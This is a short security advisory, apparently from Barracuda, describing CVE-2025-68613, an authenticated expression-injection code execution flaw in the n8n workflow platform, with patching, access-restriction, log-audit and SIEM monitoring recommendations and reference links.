The n8n workflow automation platform vulnerability, tracked as CVE‑2025‑68613, enables authenticated attackers to execute arbitrary code via expression injection in workflow definitions. Review this Cybersecurity Threat Advisory for actionable steps to mitigate your risk from this flaw.
What is the threat?
CVE‑2025‑68613 is an expression injection vulnerability in workflow definitions on the underlying server. Authenticated users with workflow creation or edit permissions can execute OS-level commands when the system evaluates those expressions. Technical reports give it a CVSS score of 9.9 and note widespread exposure among internet-accessible instances, underscoring severe risk for vulnerable deployments.
Why is it noteworthy?
What is the exposure or risk?
The exposure from CVE‑2025‑68613 centers on server-side arbitrary code execution. A crafted workflow expression, once evaluated, lets attackers run OS-level commands under the n8n process—enabling full instance takeover, access to workflow data and stored integration secrets/tokens, workflow manipulation for persistence and covert exfiltration, and lateral movement into connected systems.
What are the recommendations?
Barracuda recommends the following actions to mitigate any potential risk to your n8n instance(s):
- Apply the released patch to all n8n instances to address CVE‑2025‑68613.
- Restrict public access to the n8n UI/API by placing it behind a VPN or allow-lists. Enforce SSO/MFA and limit roles that can create or edit workflows to reduce expression injection risk.
- Preserve server logs and workflow history, audit for newly created or modified workflows with unusual expressions. Check for unexpected processes spawned by the n8n service and rotate tokens/secrets stored in n8n and connected integrations if compromise is suspected.
- Instrument SIEM to alert on workflow creation/edit events, anomalous expression patterns, sudden credential or integration changes, and host-level signals such as unexpected child processes or outbound connections from the n8n service account.
- Enumerate all n8n deployments, verify versions against the patched release, and document internet exposure (ingress rules, reverse proxies, and access policies) to prioritize patching and monitoring for publicly reachable instances.
References
For more in-depth information about the recommendations, please visit the following links:
- https://orca.security/resources/blog/cve-2025-68613-n8n-rce-vulnerability/
- https://thehackernews.com/2025/12/critical-n8n-flaw-cvss-99-enables.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-68613
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
This post originally appeared on Smarter MSP.